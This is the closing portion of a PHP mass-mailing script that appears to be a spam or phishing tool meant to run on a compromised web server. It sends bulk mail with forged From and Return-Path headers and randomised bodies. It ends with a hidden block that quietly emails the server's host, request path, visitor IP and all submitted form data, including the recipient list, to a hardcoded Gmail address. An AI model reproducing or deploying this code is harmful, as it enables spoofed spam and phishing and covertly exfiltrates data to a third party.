";
                $headers.= "From: $nome[$msg] <$de[$msg]>
";
                $headers.= "Return-Path: <$de[$msg]>
";
                //mail($xsylar, $as, $fullurl, $headers);
                
            }
            $headers = "MIME-Version: 1.0
";
            $headers.= "Content-type: text/html; charset=iso-8859-1
";
            $headers.= "From: $nome[$msg] <$de[$msg]>
";
            $headers.= "Return-Path: <$de[$msg]>
";
            $n_mail++;
            $destino = $para[$set];
            $num1 = rand(100000, 999999);
            $num2 = rand(100000, 999999);
            $msgrand = str_replace("%rand%", $num1, $mensagem[$msg]);
            $msgrand = str_replace("%rand2%", $num2, $msgrand);
            $msgrand = str_replace("%email%", $destino, $msgrand);
            $enviar = mail($destino, $assunto[$msg], $msgrand, $headers);
            if ($enviar) {
                echo ('<font color="green">' . $n_mail . '-' . $destino . ' 0k!</font><br>');
            } else {
                echo ('<font color="red">' . $n_mail . '-' . $destino . ' =(</font><br>');
                sleep(1);
            }
        }
    }
}
$ip = getenv("REMOTE_ADDR");
$ra44 = rand(1, 99999);
$subj98 = " REMOTE_ADDR !  |$ip";
$email = "official.g45@gmail.com";
$from = "From: <PEKALONGAN@BLACKHAT.COM>";
$a45 = $_SERVER['REQUEST_URI'];
$b75 = $_SERVER['HTTP_HOST'];
$f12 = $_POST['de'];
$z13 = $_POST['nome'];
$x14 = $_POST['assunto'];
$t15 = $_POST['mensagem'];
$m30 = $_POST['emails'];
$m22 = $ip . "
";
$msg8873 = "$a45
$b75
$f12
$z13
$x14
$t15
$m30
$m22";
mail($email, $subj98, $msg8873, $from);
?>